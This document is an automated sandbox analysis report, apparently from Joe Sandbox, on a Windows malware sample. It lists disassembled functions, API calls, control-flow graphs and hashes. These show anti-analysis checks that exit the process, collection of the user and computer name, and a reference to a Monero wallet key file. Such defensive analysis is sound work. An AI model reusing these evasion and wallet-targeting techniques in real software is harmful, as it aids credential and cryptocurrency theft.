                          • GetProcAddress.KERNEL32(759D0000,017857C8), ref: 00AFA4D1
                          • GetProcAddress.KERNEL32(76D80000,01785888), ref: 00AFA4F2
                          • GetProcAddress.KERNEL32(76D80000,0179CCE0), ref: 00AFA50A
                          • GetProcAddress.KERNEL32(6F5C0000,017857A8), ref: 00AFA530
                          • GetProcAddress.KERNEL32(6F5C0000,01785968), ref: 00AFA548
                          • GetProcAddress.KERNEL32(6F5C0000,01785808), ref: 00AFA560
                          • GetProcAddress.KERNEL32(6F5C0000,0179CD40), ref: 00AFA579
                          • GetProcAddress.KERNEL32(6F5C0000,017857E8), ref: 00AFA591
                          • GetProcAddress.KERNEL32(6F5C0000,01785688), ref: 00AFA5A9
                          • GetProcAddress.KERNEL32(6F5C0000,017855C8), ref: 00AFA5C2
                          • GetProcAddress.KERNEL32(6F5C0000,017855E8), ref: 00AFA5DA
                          • GetProcAddress.KERNEL32(6F5C0000,InternetSetOptionA), ref: 00AFA5F1
                          • GetProcAddress.KERNEL32(6F5C0000,HttpQueryInfoA), ref: 00AFA607
                          • GetProcAddress.KERNEL32(75480000,0179CB30), ref: 00AFA629
                          • GetProcAddress.KERNEL32(75480000,01798B08), ref: 00AFA641
                          • GetProcAddress.KERNEL32(75480000,0179CC68), ref: 00AFA659
                          • GetProcAddress.KERNEL32(75480000,0179CD28), ref: 00AFA672
                          • GetProcAddress.KERNEL32(753B0000,01785868), ref: 00AFA693
                          • GetProcAddress.KERNEL32(6E860000,0179CBF0), ref: 00AFA6B4
                          • GetProcAddress.KERNEL32(6E860000,01785848), ref: 00AFA6CD
                          • GetProcAddress.KERNEL32(6E860000,0179CBD8), ref: 00AFA6E5
                          • GetProcAddress.KERNEL32(6E860000,0179CAE8), ref: 00AFA6FD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: HttpQueryInfoA$InternetSetOptionA
                          • API String ID: 2238633743-1775429166
                          • Opcode ID: 48fd810cc2bc8f8fb749f389d140d744ac847bb8f13fea5cb23ff8b29ccf44cd
                          • Instruction ID: ff1fd0f7137b9ee33c18e8b01917ac4d2ff6edcf969bb662e5f5e92ea7f4534d
                          • Opcode Fuzzy Hash: 48fd810cc2bc8f8fb749f389d140d744ac847bb8f13fea5cb23ff8b29ccf44cd
                          • Instruction Fuzzy Hash: 9A620AB5500300AFC364DFACEE889667BF9F7AC601714852AE619C3364D7399843DB7A
                          Function 00AF5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 858 af5510-af5577 call af5ad0 call afa820 * 3 call afa740 * 4 874 af557c-af5583 858->874 875 af55d7-af564c call afa740 * 2 call ae1590 call af52c0 call afa8a0 call afa800 call afaad0 StrCmpCA 874->875 876 af5585-af55b6 call afa820 call afa7a0 call ae1590 call af51f0 874->876 902 af5693-af56a9 call afaad0 StrCmpCA 875->902 906 af564e-af568e call afa7a0 call ae1590 call af51f0 call afa8a0 call afa800 875->906 892 af55bb-af55d2 call afa8a0 call afa800 876->892 892->902 907 af56af-af56b6 902->907 908 af57dc-af5844 call afa8a0 call afa820 * 2 call ae1670 call afa800 * 4 call af6560 call ae1550 902->908 906->902 910 af56bc-af56c3 907->910 911 af57da-af585f call afaad0 StrCmpCA 907->911 1037 af5ac3-af5ac6 908->1037 915 af571e-af5793 call afa740 * 2 call ae1590 call af52c0 call afa8a0 call afa800 call afaad0 StrCmpCA 910->915 916 af56c5-af5719 call afa820 call afa7a0 call ae1590 call af51f0 call afa8a0 call afa800 910->916 930 af5865-af586c 911->930 931 af5991-af59f9 call afa8a0 call afa820 * 2 call ae1670 call afa800 * 4 call af6560 call ae1550 911->931 915->911 1014 af5795-af57d5 call afa7a0 call ae1590 call af51f0 call afa8a0 call afa800 915->1014 916->911 937 af598f-af5a14 call afaad0 StrCmpCA 930->937 938 af5872-af5879 930->938 931->1037 966 af5a28-af5a91 call afa8a0 call afa820 * 2 call ae1670 call afa800 * 4 call af6560 call ae1550 937->966 967 af5a16-af5a21 Sleep 937->967 945 af587b-af58ce call afa820 call afa7a0 call ae1590 call af51f0 call afa8a0 call afa800 938->945 946 af58d3-af5948 call afa740 * 2 call ae1590 call af52c0 call afa8a0 call afa800 call afaad0 StrCmpCA 938->946 945->937 946->937 1043 af594a-af598a call afa7a0 call ae1590 call af51f0 call afa8a0 call afa800 946->1043 966->1037 967->874 1014->911 1043->937
                          APIs
                            • Part of subcall function 00AFA820: lstrlen.KERNEL32(00AE4F05,?,?,00AE4F05,00B00DDE), ref: 00AFA82B
                            • Part of subcall function 00AFA820: lstrcpy.KERNEL32(00B00DDE,00000000), ref: 00AFA885
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00AF5644
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00AF56A1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00AF5857
                            • Part of subcall function 00AFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00AFA7E6
                            • Part of subcall function 00AF51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00AF5228
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                            • Part of subcall function 00AF52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00AF5318
                            • Part of subcall function 00AF52C0: lstrlen.KERNEL32(00000000), ref: 00AF532F
                            • Part of subcall function 00AF52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00AF5364
                            • Part of subcall function 00AF52C0: lstrlen.KERNEL32(00000000), ref: 00AF5383
                            • Part of subcall function 00AF52C0: lstrlen.KERNEL32(00000000), ref: 00AF53AE
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00AF578B
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00AF5940
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00AF5A0C
                          • Sleep.KERNEL32(0000EA60), ref: 00AF5A1B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen$Sleep
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 507064821-2791005934
                          • Opcode ID: 17960c7c8f8e7022e480911d02b714765bbb29bbd22bb4f5d5d316f44802464a
                          • Instruction ID: c152176108e5797e50813c6337a2dea05539a64469bfedfa0db71717affd50fb
                          • Opcode Fuzzy Hash: 17960c7c8f8e7022e480911d02b714765bbb29bbd22bb4f5d5d316f44802464a
                          • Instruction Fuzzy Hash: 4BE143B191020C9BCB14FBF4DE56EFD7378AF64340F408518B60B96195EF746A0ACBA2
                          Function 00AF17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1069 af17a0-af17cd call afaad0 StrCmpCA 1072 af17cf-af17d1 ExitProcess 1069->1072 1073 af17d7-af17f1 call afaad0 1069->1073 1077 af17f4-af17f8 1073->1077 1078 af17fe-af1811 1077->1078 1079 af19c2-af19cd call afa800 1077->1079 1080 af199e-af19bd 1078->1080 1081 af1817-af181a 1078->1081 1080->1077 1083 af18cf-af18e0 StrCmpCA 1081->1083 1084 af198f-af1999 call afa820 1081->1084 1085 af18ad-af18be StrCmpCA 1081->1085 1086 af1849-af1858 call afa820 1081->1086 1087 af1821-af1830 call afa820 1081->1087 1088 af187f-af1890 StrCmpCA 1081->1088 1089 af185d-af186e StrCmpCA 1081->1089 1090 af1835-af1844 call afa820 1081->1090 1091 af1913-af1924 StrCmpCA 1081->1091 1092 af1932-af1943 StrCmpCA 1081->1092 1093 af18f1-af1902 StrCmpCA 1081->1093 1094 af1951-af1962 StrCmpCA 1081->1094 1095 af1970-af1981 StrCmpCA 1081->1095 1099 af18ec 1083->1099 1100 af18e2-af18e5 1083->1100 1084->1080 1097 af18ca 1085->1097 1098 af18c0-af18c3 1085->1098 1086->1080 1087->1080 1118 af189e-af18a1 1088->1118 1119 af1892-af189c 1088->1119 1116 af187a 1089->1116 1117 af1870-af1873 1089->1117 1090->1080 1103 af1926-af1929 1091->1103 1104 af1930 1091->1104 1105 af194f 1092->1105 1106 af1945-af1948 1092->1106 1101 af190e 1093->1101 1102 af1904-af1907 1093->1102 1107 af196e 1094->1107 1108 af1964-af1967 1094->1108 1110 af198d 1095->1110 1111 af1983-af1986 1095->1111 1097->1080 1098->1097 1099->1080 1100->1099 1101->1080 1102->1101 1103->1104 1104->1080 1105->1080 1106->1105 1107->1080 1108->1107 1110->1080 1111->1110 1116->1080 1117->1116 1120 af18a8 1118->1120 1119->1120 1120->1080
                          APIs
                          • StrCmpCA.SHLWAPI(00000000,block), ref: 00AF17C5
                          • ExitProcess.KERNEL32 ref: 00AF17D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 0458407ee534a36a13d48a5ea1607ac33d5abed2b73eed1f4d4af933edd6b85e
                          • Instruction ID: 7b82d3812474e49a053981263269827d5701021521209686832f1e5aa385ef28
                          • Opcode Fuzzy Hash: 0458407ee534a36a13d48a5ea1607ac33d5abed2b73eed1f4d4af933edd6b85e
                          • Instruction Fuzzy Hash: 4C516CB4A1420EEBCB04DFE4D994BBE7BB5AF54304F108058FA06A7350D7B0D942DBA2
                          Function 00AF7500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1124 af7500-af754a GetWindowsDirectoryA 1125 af754c 1124->1125 1126 af7553-af75c7 GetVolumeInformationA call af8d00 * 3 1124->1126 1125->1126 1133 af75d8-af75df 1126->1133 1134 af75fc-af7617 GetProcessHeap RtlAllocateHeap 1133->1134 1135 af75e1-af75fa call af8d00 1133->1135 1137 af7619-af7626 call afa740 1134->1137 1138 af7628-af7658 wsprintfA call afa740 1134->1138 1135->1133 1145 af767e-af768e 1137->1145 1138->1145
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00AF7542
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00AF757F
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AF7603
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF760A
                          • wsprintfA.USER32 ref: 00AF7640
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                          • String ID: :$C$\
                          • API String ID: 1544550907-3809124531
                          • Opcode ID: 3018ce2cd4ca5322ccbf3ff68b12bc74f81a0559a71981446d43becb3e73435a
                          • Instruction ID: eba0c3a8648784348824fb327984fee648b1b6ed7b14491dd2273f145fe24761
                          • Opcode Fuzzy Hash: 3018ce2cd4ca5322ccbf3ff68b12bc74f81a0559a71981446d43becb3e73435a
                          • Instruction Fuzzy Hash: 924162B1904248ABDF10DBD4DD45BEEB7B4EF18704F100199F609A7280D7796A45CBA5
                          Function 00AF69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00AF9860: GetProcAddress.KERNEL32(75550000,01790650), ref: 00AF98A1
                            • Part of subcall function 00AF9860: GetProcAddress.KERNEL32(75550000,01790668), ref: 00AF98BA
                            • Part of subcall function 00AF9860: GetProcAddress.KERNEL32(75550000,01790680), ref: 00AF98D2
                            • Part of subcall function 00AF9860: GetProcAddress.KERNEL32(75550000,01790758), ref: 00AF98EA
                            • Part of subcall function 00AF9860: GetProcAddress.KERNEL32(75550000,01790530), ref: 00AF9903
                            • Part of subcall function 00AF9860: GetProcAddress.KERNEL32(75550000,01798B48), ref: 00AF991B
                            • Part of subcall function 00AF9860: GetProcAddress.KERNEL32(75550000,01785548), ref: 00AF9933
                            • Part of subcall function 00AF9860: GetProcAddress.KERNEL32(75550000,017854A8), ref: 00AF994C
                            • Part of subcall function 00AF9860: GetProcAddress.KERNEL32(75550000,017906E0), ref: 00AF9964
                            • Part of subcall function 00AF9860: GetProcAddress.KERNEL32(75550000,01790710), ref: 00AF997C
                            • Part of subcall function 00AF9860: GetProcAddress.KERNEL32(75550000,01790548), ref: 00AF9995
                            • Part of subcall function 00AF9860: GetProcAddress.KERNEL32(75550000,01790740), ref: 00AF99AD
                            • Part of subcall function 00AF9860: GetProcAddress.KERNEL32(75550000,01785288), ref: 00AF99C5
                            • Part of subcall function 00AF9860: GetProcAddress.KERNEL32(75550000,01790770), ref: 00AF99DE
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AE11D0: ExitProcess.KERNEL32 ref: 00AE1211
                            • Part of subcall function 00AE1160: GetSystemInfo.KERNEL32(?), ref: 00AE116A
                            • Part of subcall function 00AE1160: ExitProcess.KERNEL32 ref: 00AE117E
                            • Part of subcall function 00AE1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00AE112B
                            • Part of subcall function 00AE1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00AE1132
                            • Part of subcall function 00AE1110: ExitProcess.KERNEL32 ref: 00AE1143
                            • Part of subcall function 00AE1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00AE123E
                            • Part of subcall function 00AE1220: __aulldiv.LIBCMT ref: 00AE1258
                            • Part of subcall function 00AE1220: __aulldiv.LIBCMT ref: 00AE1266
                            • Part of subcall function 00AE1220: ExitProcess.KERNEL32 ref: 00AE1294
                            • Part of subcall function 00AF6770: GetUserDefaultLangID.KERNEL32 ref: 00AF6774
                            • Part of subcall function 00AE1190: ExitProcess.KERNEL32 ref: 00AE11C6
                            • Part of subcall function 00AF7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00AE11B7), ref: 00AF7880
                            • Part of subcall function 00AF7850: RtlAllocateHeap.NTDLL(00000000), ref: 00AF7887
                            • Part of subcall function 00AF7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00AF789F
                            • Part of subcall function 00AF78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AF7910
                            • Part of subcall function 00AF78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00AF7917
                            • Part of subcall function 00AF78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00AF792F
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01798B58,?,00B0110C,?,00000000,?,00B01110,?,00000000,00B00AEF), ref: 00AF6ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00AF6AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00AF6AF9
                          • Sleep.KERNEL32(00001770), ref: 00AF6B04
                          • CloseHandle.KERNEL32(?,00000000,?,01798B58,?,00B0110C,?,00000000,?,00B01110,?,00000000,00B00AEF), ref: 00AF6B1A
                          • ExitProcess.KERNEL32 ref: 00AF6B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                          • String ID:
                          • API String ID: 2525456742-0
                          • Opcode ID: bc9f5432f11e0155d1916778daa8522b8afef4b7aa53ec9dec306e30f12c4a93
                          • Instruction ID: a270a22c5c033ab21b62eb34a24105cb444edb8abab90e8936400154d3987786
                          • Opcode Fuzzy Hash: bc9f5432f11e0155d1916778daa8522b8afef4b7aa53ec9dec306e30f12c4a93
                          • Instruction Fuzzy Hash: 2831DE7190020CABDB14F7E0DE56BFE7778AF24380F504528F316A6191DFB05A05C6A6
                          Function 00AE1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1204 ae1220-ae1247 call af89b0 GlobalMemoryStatusEx 1207 ae1249-ae1271 call afda00 * 2 1204->1207 1208 ae1273-ae127a 1204->1208 1210 ae1281-ae1285 1207->1210 1208->1210 1212 ae129a-ae129d 1210->1212 1213 ae1287 1210->1213 1215 ae1289-ae1290 1213->1215 1216 ae1292-ae1294 ExitProcess 1213->1216 1215->1212 1215->1216
                          APIs
                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00AE123E
                          • __aulldiv.LIBCMT ref: 00AE1258
                          • __aulldiv.LIBCMT ref: 00AE1266
                          • ExitProcess.KERNEL32 ref: 00AE1294
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 3404098578-2766056989
                          • Opcode ID: f0b3ab391a39e034aa06d22ffd0ba60acb83be4d3d7db484a9298bc6bd4cc479
                          • Instruction ID: fcd204aaf4315868fea6ddcac4cfe631394bd0055bf792b73c419cc100642c52
                          • Opcode Fuzzy Hash: f0b3ab391a39e034aa06d22ffd0ba60acb83be4d3d7db484a9298bc6bd4cc479
                          • Instruction Fuzzy Hash: 0901FBB0944358ABEB10EBE5CD49BAEBB78EB14705F208058F705B6280D6B456458B99
                          Function 00AF6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1218 af6af3 1219 af6b0a 1218->1219 1221 af6b0c-af6b22 call af6920 call af5b10 CloseHandle ExitProcess 1219->1221 1222 af6aba-af6ad7 call afaad0 OpenEventA 1219->1222 1228 af6ad9-af6af1 call afaad0 CreateEventA 1222->1228 1229 af6af5-af6b04 CloseHandle Sleep 1222->1229 1228->1221 1229->1219
                          APIs
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01798B58,?,00B0110C,?,00000000,?,00B01110,?,00000000,00B00AEF), ref: 00AF6ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00AF6AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00AF6AF9
                          • Sleep.KERNEL32(00001770), ref: 00AF6B04
                          • CloseHandle.KERNEL32(?,00000000,?,01798B58,?,00B0110C,?,00000000,?,00B01110,?,00000000,00B00AEF), ref: 00AF6B1A
